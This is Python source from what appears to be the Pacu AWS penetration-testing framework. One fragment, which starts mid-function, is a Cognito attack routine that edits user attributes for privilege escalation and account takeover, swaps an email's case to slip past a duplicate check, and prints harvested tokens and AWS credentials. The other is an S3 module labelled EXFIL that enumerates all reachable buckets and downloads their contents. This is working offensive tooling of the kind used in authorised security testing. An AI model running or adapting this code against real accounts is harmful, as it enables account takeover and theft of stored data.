            print("Assumed role successfully.")
            if new_role["Credentials"]["AccessKeyId"] is not None:
                print("Access Key ID found.")
                print(new_role["Credentials"]["AccessKeyId"])
            if new_role["Credentials"]["SecretKey"] is not None:
                print("Secret Key found.")
                print(new_role["Credentials"]["SecretKey"])
            if new_role["Credentials"]["SessionToken"] is not None:
                print("Session Token found.")
                print(new_role["Credentials"]["SessionToken"])
            if new_role["Credentials"]["Expiration"] is not None:
                print("Expiration found.")
                print(new_role["Credentials"]["Expiration"])
            return new_role
        else:
            print("Invalid choice.")
            return False
    except ValueError:
        print("Invalid choice.")
        return False


def get_custom_attributes(
    client,
    tokens,
    att_password,
    newregion,
    att_clientId,
    att_userPoolId,
    cognito_identity_pools,
    identity_client,
    identity_pool,
):
    currentuser = client.get_user(
        AccessToken=tokens["AuthenticationResult"]["AccessToken"]
    )
    search_string = "custom"
    if any(
        search_string in attribute["Name"]
        for attribute in currentuser["UserAttributes"]
    ):
        print(
            "Custom attribute(s) found! Changing these may lead to privilege escalation."
        )
    else:
        print("No custom attributes found.")
    print(
        "Changing basic attributes such as email may lead to account takeover if they are used to identify users. "
    )
    print("Printing all current attributes: ")
    print(currentuser["UserAttributes"])
    prompt = (
        f"Enter attribute name to modify for user {currentuser['Username']} "
        "or hit enter to skip: "
    )
    attribute_name = input(prompt)
    prompt = (
        f"Enter attribute value to set for user {currentuser['Username']} "
        "or hit enter to skip: "
    )
    attribute_value = input(prompt)
    if attribute_name != "" and attribute_value != "":
        try:
            client.update_user_attributes(
                AccessToken=tokens["AuthenticationResult"]["AccessToken"],
                UserAttributes=[
                    {"Name": attribute_name, "Value": attribute_value},
                ],
            )
            print("Attribute updated!")
        except ClientError as error:
            error_code = error.response["Error"]["Code"]
            if attribute_name == "email" and error_code == "InvalidParameterException":
                print(
                    "Error when updating email attribute. This may be because the email is already in use. Attempting to change case to bypass this defense."
                )
                modified_value = attribute_value.swapcase()
                try:
                    client.update_user_attributes(
                        AccessToken=tokens["AuthenticationResult"]["AccessToken"],
                        UserAttributes=[
                            {"Name": attribute_name, "Value": modified_value},
                        ],
                    )
                    print("Attribute updated!")
                except ClientError as error:
                    code = error.response["Error"]["Code"]
                    print("FAILURE: ")
                    print("  " + code)
                    print("  Skipping user attribute modification...")
            else:
                code = error.response["Error"]["Code"]
                print("FAILURE: ")
                if code == "InvalidParameterException":
                    print("  InvalidParameterException")
                    print("  Skipping user attribute modification...")
                else:
                    print("  " + code)
                print("  Skipping user attribute modification...")
    else:
        print("Attributes not updated.")
        return None, None
    prompt = (
        f"Authenticate again as user {currentuser['Username']} "
        "to check for privilege escalation/account takeover? (Y/N): "
    )
    choice = input(prompt)
    if choice.lower() == "y":
        try:
            aws2 = AWSSRP(
                username=currentuser["Username"],
                password=att_password,
                client_id=att_clientId,
                pool_id=att_userPoolId,
                client=client,
            )
            tokens = aws2.authenticate_user()
            print("You're signed in as " + currentuser["Username"] + "!")
            print(
                "Your access token is: " + tokens["AuthenticationResult"]["AccessToken"]
            )
            print("Your ID token is: " + tokens["AuthenticationResult"]["IdToken"])
            print(
                "Your refresh token is: "
                + tokens["AuthenticationResult"]["RefreshToken"]
            )
            print("Your token type is: " + tokens["AuthenticationResult"]["TokenType"])
            credentials = get_identity_credentials(
                cognito_identity_pools,
                identity_client,
                tokens["AuthenticationResult"]["IdToken"],
                att_userPoolId,
                newregion,
            )
            if credentials is not None:
                print("Temporary credentials retrieved!")
                print(credentials)
            roles = get_assumable_roles(tokens["AuthenticationResult"]["IdToken"])
            prompt_assume_roles(
                identity_client,
                identity_pool,
                roles,
                newregion,
                att_userPoolId,
                tokens["AuthenticationResult"]["IdToken"],
            )
            prompt = "Modify more custom attributes? (y/n):"
            choice = input(prompt)
            if choice.lower() == "y":
                get_custom_attributes(
                    client,
                    tokens,
                    att_password,
                    newregion,
                    att_clientId,
                    att_userPoolId,
                    cognito_identity_pools,
                    identity_client,
                    identity_pool,
                )
            else:
                print("Exiting...")
                return tokens, credentials
        except SoftwareTokenMFAChallengeException as error:
            try:
                code = input(
                    "Please enter the MFA code generated by your application: "
                )
                print("Entering final MFA challenge")
                error_string = str(error)
                aws2session = re.search(r"'Session': '(.*?)'", error_string)
                if aws2session:
                    aws2sessionfinal = aws2session.group(1)
                else:
                    print("NO MATCH FOUND")
                    return None, None
                tokens = client.respond_to_auth_challenge(
                    ClientId=att_clientId,
                    ChallengeName="SOFTWARE_TOKEN_MFA",
                    Session=aws2sessionfinal,
                    ChallengeResponses={
                        "USERNAME": currentuser["Username"],
                        "SOFTWARE_TOKEN_MFA_CODE": code,
                    },
                )
                print("You're signed in as " + currentuser["Username"] + "!")
                print(
                    "Your access token is: "
                    + tokens["AuthenticationResult"]["AccessToken"]
                )
                print("Your ID token is: " + tokens["AuthenticationResult"]["IdToken"])
                print(
                    "Your refresh token is: "
                    + tokens["AuthenticationResult"]["RefreshToken"]
                )
                print(
                    "Your token type is: " + tokens["AuthenticationResult"]["TokenType"]
                )
                credentials = get_identity_credentials(
                    cognito_identity_pools,
                    identity_client,
                    tokens["AuthenticationResult"]["IdToken"],
                    att_userPoolId,
                    newregion,
                )
                if credentials is not None:
                    print("Temporary credentials retrieved!")
                    print(credentials)
                roles = get_assumable_roles(tokens["AuthenticationResult"]["IdToken"])
                prompt_assume_roles(
                    identity_client,
                    identity_pool,
                    roles,
                    newregion,
                    att_userPoolId,
                    tokens["AuthenticationResult"]["IdToken"],
                )
                prompt = "Modify more custom attributes?"
                choice = input(prompt)
                if choice.lower() == "y":
                    get_custom_attributes(
                        client,
                        tokens,
                        att_password,
                        newregion,
                        att_clientId,
                        att_userPoolId,
                        cognito_identity_pools,
                        identity_client,
                        identity_pool,
                    )
                else:
                    print("Exiting...")
                    return tokens, credentials
            except ClientError as err:
                print(err)
                return None, None


def get_identity_credentials(
    cognito_identity_pools,
    identity_client,
    id_token=None,
    user_pool_id=None,
    region=None,
):
    for identity_pool in cognito_identity_pools:
        if identity_pool["Region"] == region:
            try:
                if id_token is None:
                    print("Attempting unauthenticated retrieval of identity Id")
                    identity_id = identity_client.get_id(
                        IdentityPoolId=identity_pool["IdentityPoolId"]
                    )
                    print(f"Identity ID: {identity_id}")
                if id_token is not None:
                    logins = {
                        "cognito-idp."
                        + region
                        + ".amazonaws.com/"
                        + user_pool_id: id_token
                    }
                    print("Attempting authenticated retrieval of identity Id")
                    identity_id = identity_client.get_id(
                        IdentityPoolId=identity_pool["IdentityPoolId"], Logins=logins
                    )
                    print(f"Identity ID: {identity_id}")
            except ClientError as error:
                print("FAILURE: ")
                code = error.response["Error"]["Code"]
                print("  " + code)
                continue
            if id_token is not None:
                try:
                    logins = {
                        "cognito-idp."
                        + region
                        + ".amazonaws.com/"
                        + user_pool_id: id_token
                    }
                    print("Attempting authenticated retrieval of temporary credentials")
                    identity_creds = identity_client.get_credentials_for_identity(
                        IdentityId=identity_id["IdentityId"], Logins=logins
                    )
                except error as error:
                    code = error.response["Error"]["Code"]
                    if code == "UnauthorizedOperation":
                        print("  Access denied to GetId or GetCredentialsForIdentity.")
                    else:
                        print("  " + code)
                    print(
                        "  Skipping identity pool enumeration for this identity client..."
                    )
            else:
                try:
                    print(
                        "Attempting unauthenticated retrieval of identity Id credentials"
                    )
                    identity_creds = identity_client.get_credentials_for_identity(
                        IdentityId=identity_id["IdentityId"]
                    )
                except error as error:
                    code = error.response["Error"]["Code"]
                    if code == "UnauthorizedOperation":
                        print("  Access denied to GetId or GetCredentialsForIdentity.")
                    else:
                        print("  " + code)
                    print(
                        "  Skipping identity pool enumeration for this identity client..."
                    )
            if identity_creds["Credentials"]["AccessKeyId"] is not None:
                print("Access Key ID found.")
                identity_pool["AccessKeyId"] = identity_creds["Credentials"][
                    "AccessKeyId"
                ]
                print(identity_pool["AccessKeyId"])
            if identity_creds["Credentials"]["SecretKey"] is not None:
                print("Secret Key found.")
                identity_pool["SecretKey"] = identity_creds["Credentials"]["SecretKey"]
                print(identity_pool["SecretKey"])
            if identity_creds["Credentials"]["SessionToken"] is not None:
                print("Session Token found.")
                identity_pool["SessionToken"] = identity_creds["Credentials"][
                    "SessionToken"
                ]
                print(identity_pool["SessionToken"])
            if identity_creds["Credentials"]["Expiration"] is not None:
                print("Expiration found.")
                identity_pool["Expiration"] = identity_creds["Credentials"][
                    "Expiration"
                ]
                print(identity_pool["Expiration"])
                return identity_pool



#!/usr/bin/env python3
import argparse
import datetime
from copy import deepcopy
import os

from botocore.exceptions import ClientError

from pacu.core.lib import save, strip_lines

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 's3__download_bucket',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'EXFIL',
    'one_liner': 'Enumerate and dumps files from S3 buckets.',
    'description': strip_lines('''
        This module scans the current account for AWS buckets and prints/stores as much data as it can about each one. 
        With no arguments, this module will enumerate all buckets the account has access to, then prompt you to download
        all files in the bucket or not. Use --names-only or --dl-names to change that. The files will be downloaded to
        ~/.local/share/pacu/sessions/[current_session_name]/downloads/s3__download_bucket/.
    '''),
    'services': ['S3'],
    'prerequisite_modules': [],
    'arguments_to_autocomplete': ['--dl-all', '--names-only', '--dl-names'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


parser.add_argument('--dl-all', required=False, action='store_true', help=strip_lines('''
    If specified, automatically download all files from buckets that are allowed instead of asking for each one.
    WARNING: This could mean you could potentially be downloading terrabytes of data! It is suggested to user
    --names-only and then --dl-names to download specific files.
'''))
parser.add_argument('--names-only', required=False, action='store_true', help=strip_lines('''
    If specified, only pull the names of files in the buckets instead of downloading. This can help in cases where the
    whole bucket is a large amount of data and you only want to target specific files for download. This option will
    store the filenames in a .txt file in
    ~/.local/share/pacu/sessions/[current_session_name]/downloads/s3__download_bucket/s3__download_bucket_file_names.txt,
    one per line, formatted as "filename@bucketname". These can then be used with the "--dl-names" option.
'''))
parser.add_argument('--dl-names', required=False, default=False, help=strip_lines('''
    A path to a file that includes the only files to be downloaded, one per line. The format for these files must be
    "filename.ext@bucketname", which is what the --names-only argument outputs.
'''))

FILE_SIZE_THRESHOLD = 1073741824


def get_bucket_size(pacu, bucket_name):
    client = pacu.get_boto3_client('cloudwatch', 'us-east-1')
    response = client.get_metric_statistics(
        Namespace='AWS/S3',
        MetricName='BucketSizeBytes',
        Dimensions=[
            {'Name': 'BucketName', 'Value': bucket_name},
            {'Name': 'StorageType', 'Value': 'StandardStorage'}
        ],
        Statistics=['Average'],
        Period=3600,
        StartTime=datetime.datetime.today() - datetime.timedelta(days=1),
        EndTime=datetime.datetime.now().isoformat()
    )
    if response['Datapoints']:
        return response['Datapoints'][0]['Average']
    return 0


def download_s3_file(pacu, key, bucket):
    s3 = pacu.get_boto3_resource('s3')
    base_directory = '{}/{}/'.format(module_info['name'], bucket)

    size = s3.Object(bucket, key).content_length
    if size > FILE_SIZE_THRESHOLD:
        pacu.print('  LARGE FILE DETECTED:')
        confirm = pacu.input('    Download {}? Size: {} bytes (y/n) '.format(key, size))
        if confirm != 'y':
            return False
    try:
        with save(base_directory + key, 'wb') as f:
            s3.Bucket(bucket).download_fileobj(key, f)
    except Exception as error:
        pacu.print('  {}'.format(error))
        return False
    return True


def extract_from_file(pacu, file):
    files = {}
    try:
        with open(file, 'r') as bucket_file:
            for line in bucket_file:
                delimiter = line.rfind('@')
                key = line[:delimiter]
                bucket = line[delimiter + 1:-1]
                files[key] = bucket
    except FileNotFoundError:
        pacu.print('  Download File not found...')
    return files


def write_bucket_keys_to_file(pacu, objects):
    pacu.print('  Writing file names to disk...')
    session = pacu.get_active_session()
    p = '{}/{}_file_names.txt'.format(module_info['name'], module_info['name'])
    try:
        with save(p, 'w') as objects_file:
            for key in objects:
                for file in objects[key]:
                    objects_file.write('{}@{}\n'.format(file, key))
    except Exception as error:
        print(error)
    return True


def main(args, pacu_main):

    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print

    input = pacu_main.input

    if (
            (args.names_only is True and args.dl_names is True) or
            (args.names_only is True and args.dl_all is True) or
            (args.dl_names is True and args.dl_all is True)
    ):
        print('Only zero or one options of --dl-all, --names-only, and --dl-names may be specified. Exiting...')
        return {}

    # Download Objects from File
    if args.dl_names:
        pacu_main.print('  Extracting files from file...')
        extracted_files = extract_from_file(pacu_main, args.dl_names)
        total = len(extracted_files.keys())
        success = 0
        for key in extracted_files:
            if download_s3_file(pacu_main, key, extracted_files[key]):
                success += 1
        pacu_main.print('  Finished downloading from file...')
        return {'downloaded_files': success, 'failed': total - success}

    # Enumerate Buckets
    client = pacu_main.get_boto3_client('s3')

    buckets = []
    print('Enumerating buckets...')
    try:
        response = client.list_buckets()
    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDenied':
            print('  FAILURE: MISSING AWS PERMISSIONS')
        else:
            print(code)
        return {}

    s3_data = deepcopy(session.S3)
    s3_data['Buckets'] = deepcopy(response['Buckets'])
    session.update(pacu_main.database, S3=s3_data)
    summary_data = {'buckets': len(response['Buckets'])}
    for bucket in response['Buckets']:
        buckets.append(bucket['Name'])
        print('  Found bucket "{bucket_name}"'.format(bucket_name=bucket['Name']))

    # Process Enumerated Buckets
    print('Starting enumerating objects in buckets...')
    summary_data['readable_buckets'] = 0
    objects = {}
    for bucket in buckets:
        paginator = client.get_paginator('list_objects_v2')
        page_iterator = paginator.paginate(Bucket=bucket)

        objects[bucket] = []
        try:
            for page in page_iterator:
                if 'Contents' in page:
                    keys = [key['Key'] for key in page['Contents']]
                    objects[bucket].extend(keys)
            summary_data['readable_buckets'] += 1
        except ClientError as error:
            print('  Unable to read bucket')
            code = error.response['Error']['Code']
            print(code)
            continue
        continue
    # Enumerated buckets and associated list of files
    print('Finished enumerating objects in buckets...')

    if args.names_only:
        write_bucket_keys_to_file(pacu_main, objects)
        return summary_data
    summary_data['downloaded_files'] = 0
    for bucket in objects:
        print('  Bucket: "{}" Size: {} Bytes'.format(bucket, get_bucket_size(pacu_main, bucket)))
        if input('    Download files (y/n)? ') != 'y':
            continue
        for key in objects[bucket]:
            if not args.dl_all:
                if input('  Download "{}" in "{}" (y/n)? '.format(key, bucket)) != 'y':
                    continue
            fails = 0
            ignore = False
            if not download_s3_file(pacu_main, key, bucket):
                fails += 1
            else:
                summary_data['downloaded_files'] += 1
            if not ignore and fails == 5:
                print('  5 files failed to download.')
                prompt = input('  Continue downloading attempts? (y/n) ')
                if prompt != 'y':
                    break
                ignore = True
    print('All buckets have been analyzed.')
    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'buckets' in data:
        out += '  {} total buckets found.\n'.format(data['buckets'])
    if 'readable_buckets' in data:
        out += '  {} buckets found with read permissions.\n'.format(data['readable_buckets'])
    if 'downloaded_files' in data:
        out += '  {} files downloaded.\n'.format(data['downloaded_files'])
    if 'failed' in data:
        out += '  {} files failed to be downloaded.\n'.format(data['failed'])
    if not out:
        return '  No actions were taken.'
    return out
